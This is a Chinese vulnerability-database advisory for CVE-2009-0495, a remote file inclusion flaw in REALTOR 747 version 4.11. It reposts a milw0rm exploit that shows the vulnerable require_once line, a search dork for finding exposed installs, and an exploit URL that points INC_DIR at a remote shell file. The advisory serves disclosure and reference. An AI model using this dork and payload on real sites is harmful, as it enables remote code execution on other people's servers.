REALTOR 747 'include/define.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117224 漏洞类型 代码注入
发布时间 2009-01-12 更新时间 2009-02-10
CVE编号 CVE-2009-0495 CNNVD-ID CNNVD-200902-242
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7743
https://cxsecurity.com/issue/WLB-2009020155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-242
|漏洞详情
REALTOR747是一款在线房屋中介信息发布和业务管理的程序。REALTOR7474.11版本中的include/define.php存在PHP远程文件包含漏洞。远程攻击者可以借助INC_DIR参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
-----------------:Remote File Include:-----------------
              -------------------------------------------------------


script:realtor747 Version 4.11
   
------------------------------------------------------------------
download from:http://www.it747.com/realtor747/intro/trial/realtor747-v4-11-trial.zip
   
------------------------------------------------------------------

.......................................................
vul:/include/define.php line 51:

require_once( "$INC_DIR/define_area.php" );

------------------------------------------------------

dork:"REALTOR 747 - Version 4.11"
-----------------------------------------------------

xpl:

http://127.0.0.1/path/include/define.php?INC_DIR=[shell.txt?]


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady   [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-01-12]
|参考资料

来源:BID
名称:33227
链接:http://www.securityfocus.com/bid/33227
来源:MILW0RM
名称:7743
链接:http://www.milw0rm.com/exploits/7743